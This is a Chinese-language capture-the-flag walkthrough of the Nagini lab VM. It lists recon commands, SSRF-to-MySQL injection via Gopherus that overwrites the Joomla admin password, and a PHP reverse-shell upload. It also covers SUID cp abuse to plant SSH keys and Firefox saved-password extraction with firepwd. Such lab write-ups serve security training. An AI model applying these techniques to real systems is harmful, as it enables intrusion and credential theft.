Nagini 是 HarryPotter VM 系列的第二个 VM,您需要在其中找到隐藏在机器内的 3 个魂器(哈利波特系列的 3 个 VM 中总共隐藏了 8 个魂器)并最终击败 Voldemort。
信息收集
nmap扫描
nmap -sC -sV 192.168.210.229
网站信息收集
一张图片啥也没有
网站目录爆破
gobuster dir -u [http://192.168.210.229](http://192.168.210.229) -x html,txt,php,bak --wordlist=/usr/share/wordlists/dirb/common.txt
扫出来了一个note.txt 一个joomla
先去看看joomla
网站cms为joomla 。joomscan跑下试试
joomscan --url 192.168.210.229/joomla
发现cms版本为Joomla 3.9.25
扫到一个备份的配置文件
http://192.168.210.229/joomla/configuration.php.bak
里面发现了数据库信息 得到用户goblin 密码为空 但是只能本地登录
再去看看note.txt
这里告诉我们要用http3访问https://quic.nagini.hogwarts
http3环境不会搞。。。。搜索其他攻略发现存在internalResourceFeTcher.php字样的提示
访问http://192.168.210.229/internalResourceFeTcher.php
可以使用file方法查看文件
漏洞利用
获取后台用户密码
需要利用工具
Gopherus:https://github.com/tarunkant/Gopherus
上文步骤中已经知道数据库名为joomla
查询库中的表名
在http://192.168.210.229/internalResourceFeTcher.php中填入连接 ,,如果没出结果请刷新几次
可知目标表名为joomla_users
继续查询
直接更新密码
5f4dcc3b5aa765d61d8327deb882cf99 = password
USE joomla; UPDATE joomla_users SET password=‘5f4dcc3b5aa765d61d8327deb882cf99’ WHERE email=‘site_admin@nagini.hogwarts’;
getshell
登录后台
选择组件
点击 newfie 创建新文件
写一个php反弹shell马
访问一下php页面http://192.168.210.229/joomla/templates/protostar/muma.php
python调bash
python3 -c “import pty;pty.spawn(’/bin/bash’)”
在/var/www/html发现一个魂器
horcrux_{MzogU2x5dGhFcmlOJ3MgTG9jS0VldCBkRXN0cm9ZZUQgYlkgUm9O}
在hermoine用户家目录下发现第二个魂器,但是我们没有权限查看
换snape用户家目录
发现隐藏文件.creds.txt
base64解码得到一个密码 Love@lilly
漏洞利用 -ssh免密登录
切换至snape用户
查看suid权限
su_cp有suid权限,
尝试实施ssh免密登录
把kali的ssh公钥放进去
注意赋予640权限
/home/hermoine/bin/su_cp -p authorized_keys /home/hermoine/.ssh/
免密登录成功,拿到第二个魂器
提权-firefox密码泄露
在~/.mozilla/firefox/g2mhbq0o.default下发现火狐浏览器的记录信息,里面可能会有记录的用户名密码,但是直接打开看不了
python建立http服务
python3 -m http.server 8888
使用firewd工具(用于解密Mozilla受保护密码的开源工具)
下载连接https://github.com/lclevy/firepwd
按安装工具pip install -r requirements.txt
将两个文件下载到本地
wget http://192.168.210.229:8888/key4.db
wget http://192.168.210.229:8888/logins.json
将脚本复制到与密码文件一个目录下
cp ~/tools/firepwd-master/firepwd.py ./
执行脚本
python3 firepwd.py
成功爆破出root @Alohomora#123
切换到root,成功拿到第三个魂器